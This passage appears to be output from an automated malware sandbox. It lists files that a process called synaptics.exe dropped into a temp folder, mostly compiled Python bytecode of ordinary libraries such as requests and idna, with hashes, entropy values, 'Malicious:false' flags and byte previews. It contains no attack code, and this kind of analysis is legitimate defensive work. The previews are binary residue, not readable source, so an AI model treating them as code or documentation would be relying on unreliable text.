                                                                                                                                                                                                                Preview:o........!.f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1949
                                                                                                                                                                                                                Entropy (8bit):5.283699507796706
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:orDo6itCRy/ORh72XN+Rl/99X7iEvR9Bn:orc7kR2XNC/9t7jvN
                                                                                                                                                                                                                MD5:FB685627E412F294FA5D578505A4C5FB
                                                                                                                                                                                                                SHA1:033F6652C9E42A44D3630BACC2F7D2A48270467B
                                                                                                                                                                                                                SHA-256:2348F66CEB5F2E40742CE6E6EE1AC182A561527B9944224653445C846716F729
                                                                                                                                                                                                                SHA-512:262216FBD517928113F97BE0A7916C510D6C00653A63697E19586DDA2CE58AA2121E6031E7BB79F6E5E04254BA90752ED5748C17B02195BF54727F24474F97D8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                Entropy (8bit):4.685395375896109
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:y/hGuletxbkCoeJ/Lt/lPlm5jAuT6MWRIFMHdVWrzSBw5JOmIOt2TgN:y/IqetGCow5G+uGuFM9ArmBw5Ampt2s
                                                                                                                                                                                                                MD5:5651604C8640D12AAFD3283AD47145DD
                                                                                                                                                                                                                SHA1:22804FC2329A8F318B073539D8FFAC0142145894
                                                                                                                                                                                                                SHA-256:0FC2BF2576B9AD3C8AF637C0BF7E359110E2EA36F58EB8FDE2357F593C0145FD
                                                                                                                                                                                                                SHA-512:217EAD4D729E75D1D9F4774D1F172FB18E5617270CA1449DB1B8AD926001B351C454F8AA3250A825569471E1C2ADA0EFAF007DAF4B778BBF00A9F2328D7A0751
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....@C:\Users\user\Desktop\tmp\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3901
                                                                                                                                                                                                                Entropy (8bit):5.780548834719001
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:AqPoGNOeYVGivMhhFJQlIgSdAhoopVaxdses42WQXIBmPy6V7:BP8MhqKgSehwdFQYBwh
                                                                                                                                                                                                                MD5:6C12B8FE5E0706D0746759FA0B128B14
                                                                                                                                                                                                                SHA1:15244FF8D40BA3356529AE70D2FE07D2955A3A8B
                                                                                                                                                                                                                SHA-256:119FFB0CEC7D642F51AC71DD6111400C1C6A2D51D150102E01C8382C323437F1
                                                                                                                                                                                                                SHA-512:3AF315F0270C6173C1A496B38F61FA3A81BCDB146C2DAA5C729FA1A131023B55D1B0C07FD0CA3E5A18E738E983B76F93E5C9385607BDCB1F3D93652ADA7F2F35
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):515
                                                                                                                                                                                                                Entropy (8bit):5.466257361551644
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CF+UexOsG8ReRyu7msvBXV5b4SazcAFAu63WcJaRm7hooookk:bxdOyqmsvBF5McAFAu6pJa4ek
                                                                                                                                                                                                                MD5:E7F1C4FC75A30C51B498B432C6FA4184
                                                                                                                                                                                                                SHA1:72F4FA3BE57F3CE60000FA482EDE89585BADEDEB
                                                                                                                                                                                                                SHA-256:A90D2A7905619F60CF8856839DCFD69C8A8DE5C87FD4AD4DDE1A0E97A79868A1
                                                                                                                                                                                                                SHA-512:931BED69F8AE9F7003DD4C3DF34FED2765434A5773E4193577463EABA39992883595572444BB975AAE86497BD646E0DDF2F589E129BE7B6BCA757AA0BF72C598
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1591
                                                                                                                                                                                                                Entropy (8bit):5.638618069747913
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:6BUBWmfmQURGWydfvTsNWGioiklxL6yaWQ5Ycr1OlX471aNNqagEb/m5Q5lC:0UBWAmpGWydoNxLncr1OlX4Ja8me5Q+
                                                                                                                                                                                                                MD5:56EBD214EB17507859284472A5B9B3C2
                                                                                                                                                                                                                SHA1:00F5AC8928E1B86FBB21966F6A4C1672AFF927EB
                                                                                                                                                                                                                SHA-256:8754C745041465505C28A2AF13720C97BBE78C314D7B12A815945E3896099BBA
                                                                                                                                                                                                                SHA-512:A50F8747D6E34DFDE8AEF35C426715F3EC1E5F857187A2FF17077D5A84C361E5259F8AB9DDAFFDA672B99F54CBB98C6E21DBED9859BBD1DC42AEE62FDD63A32E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....GC:\Users\user\Desktop\tmp\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicode s
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22005
                                                                                                                                                                                                                Entropy (8bit):5.429768704647921
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:omMHzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:U0TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                                MD5:391D02BC1D6FA978A47CC925C9A11267
                                                                                                                                                                                                                SHA1:648841EB08143A7AE3FB8BED399F508971A3EF4A
                                                                                                                                                                                                                SHA-256:2F04FA62F5EA060B5DF2CEC73C9C9A1E223EB91C9C16BA7F87464336F3D232F8
                                                                                                                                                                                                                SHA-512:ED4495606242BAD5FAF415B4C14C3387F94B6340532426D7727BEFD90AC07252C184ECF52813463DF33754AFF9FD3C3C56E9506481306A2E8CF201FACBE424B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6691
                                                                                                                                                                                                                Entropy (8bit):5.138611456762868
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:c4kMfrO7AyGLluXW87ZolNAzj8t8iYat9DMGm6RGmOsGmfiC:AMDY7EeZjM89eRys2C
                                                                                                                                                                                                                MD5:CE0005DD1A660FB52C18571569271CDB
                                                                                                                                                                                                                SHA1:1F1693A5B507EBD18B93A70F05C6277FBEDA837E
                                                                                                                                                                                                                SHA-256:E3822F79D20D269B291D45D6CC9D3755711F4EEB5FEF305AB95DB3835382BE39
                                                                                                                                                                                                                SHA-512:CA0A23BC8F30944113D16A242C8ECCFD9477F68993EA700BF57FB29451773BD13900BA428CFD151FDAA474186E6FB220C69FE99E87E63819064EFEEAACA6C406
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8087
                                                                                                                                                                                                                Entropy (8bit):5.484557071852769
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:pB0Ym1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:n0Ym1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                                MD5:ADBCD0B6FC928A24874B122485172E9C
                                                                                                                                                                                                                SHA1:0911892FF876503DA41F5F6A28803BF147579F75
                                                                                                                                                                                                                SHA-256:4606D2FB8A70BC5D3ED2915C649D92F78D6E4B6B9BEC6924B1A86DBAB1E69B79
                                                                                                                                                                                                                SHA-512:0921F614E973188CEC125CE6361E4EE7D5D9BC76005B259387ECD5DA0B660E3F1FDFCCDAC1A6C9B8972583AD1D53F26E5D0E8211350DF97CF0787784CA5BE078
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):592
                                                                                                                                                                                                                Entropy (8bit):5.230448721366558
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CrOBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01taRUcENM:qgbXKAhwa93DRC5aZ
                                                                                                                                                                                                                MD5:8A99F9F4D2CB0D845625DE32BFB172EC
                                                                                                                                                                                                                SHA1:061B419A35003A74217E878FBA02B765EBB8DF33
                                                                                                                                                                                                                SHA-256:B570E0A8D1AB3C182FDDE5177482057607B68BE1ED8ED0BA3251414DFFB43542
                                                                                                                                                                                                                SHA-512:E37D8BF307CB7AFF8878C25E4AEEFDD811BA88F2B1DE88565F277D82D0AD2E34B81600E45D02BF168FE1E0DA15ADD6D49CE2C8D3D6FD93F0B8A3FFBA21E0F7E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....=C:\Users\user\Desktop\tmp\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1743
                                                                                                                                                                                                                Entropy (8bit):5.577824354095918
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3AUIkbGXHyOLyRJV79xlKPV+5MTYGi4k0b8+:3R8XyUyRJJ9jKPV+5f4kI
                                                                                                                                                                                                                MD5:E947711844B8D8B19292D7302F1F2BDC
                                                                                                                                                                                                                SHA1:A7F2F03DEE689F7416AA05F9098C95C170F6913E
                                                                                                                                                                                                                SHA-256:CA1D937E74E1569F0D84A85A492C6B632393B95B47DC0F6FB8497080E380C967
                                                                                                                                                                                                                SHA-512:1458D40AF30BBE67DFACF8E3D38B9B53878F73E1DFF382D5901ADAECC17DBD51E5529357D95F2409FBC396F62FEE82957288283F4851F09BA1D51F2CF47E7C89
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....>C:\Users\user\Desktop\tmp\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..Muta
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18686
                                                                                                                                                                                                                Entropy (8bit):5.25564225949697
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:VEvXh9n08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:VEvXh9n08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                                MD5:285B04E192C2EF5FB0FEC061558005B1
                                                                                                                                                                                                                SHA1:81B2A9E971EB6F0774DA79E2C9094EFBF4F35CE2
                                                                                                                                                                                                                SHA-256:B6AA379BA64F31C2BA7EA69E78297A68A3AD57153CA28533A5398F36D3E009D8
                                                                                                                                                                                                                SHA-512:B44EB87084C28350361DEC41A7256FE76876021B6320433AC2E2F43C5BE0D6267E0CC5E5F1ABC917290E77A3A3C67110074B4DDF971E9BCC801D3224B1C3CEB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6194
                                                                                                                                                                                                                Entropy (8bit):4.915203142772503
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:PrpcnB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:Prp9xIlv/JPr6OgH2Qh
                                                                                                                                                                                                                MD5:1FA49D78B9C6448BAE2CF33480D11B83
                                                                                                                                                                                                                SHA1:BB970809A88D2F2B2AA911FC5A2B9A16260E694C
                                                                                                                                                                                                                SHA-256:64A266F1E54085C3D1E4F8DFA68F18D5C1629A4FE5AAAB03C946F47B4CCC5BB2
                                                                                                                                                                                                                SHA-512:447BD114021463310A01B149CAE9E9C85C702BC9B7C8D05717FE71205731DFE9D7FD33AF522D30F8E9E096AB7997EA252582666512D2076B88E272BF54F9AEED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                Entropy (8bit):5.186552944244859
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:Nx1qlJ5pMUqTDP/+/kuamY+qnvWZ3b1e7N:ERyDPGvYxS3bUx
                                                                                                                                                                                                                MD5:5E059EC21C87F6824F56A93DE1F388D6
                                                                                                                                                                                                                SHA1:498B655C71411E414921D1AC1B1DE354273E3393
                                                                                                                                                                                                                SHA-256:C5DA7329CD7E354A563BF90C6E8A6618B591F33DF33AD854EA396F82358AF117
                                                                                                                                                                                                                SHA-512:ACB1DB383C95DB041CB70D4184731E01DED6C102229262A70A92F8A903CD9B57BC67C4DA75D609C94C8AAD8E4D18B9EB9283F49C2544015B16519A01158D595F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....=C:\Users\user\Desktop\tmp\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24181
                                                                                                                                                                                                                Entropy (8bit):5.462612171508139
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:u34AgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:u3A6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                                MD5:8A9C2E139D027C1650260D5727A272ED
                                                                                                                                                                                                                SHA1:8F91FCFF49C67FC78847AF8B532E06480F0F2E43
                                                                                                                                                                                                                SHA-256:24553AD9726CC3505BB034B58CAE2FF621D3B6ABFFE5325F204A76A260148994
                                                                                                                                                                                                                SHA-512:2E6F7C2309BC1ED134F76F5FE45DE0664BA249E90FDE06E440553A8D920D41DE90DB047ADFB998A535B5B230817E460B7DAA772FB7CCF903677B2DE3C363693E
                                                                                                                                                                                                                Malicious:false
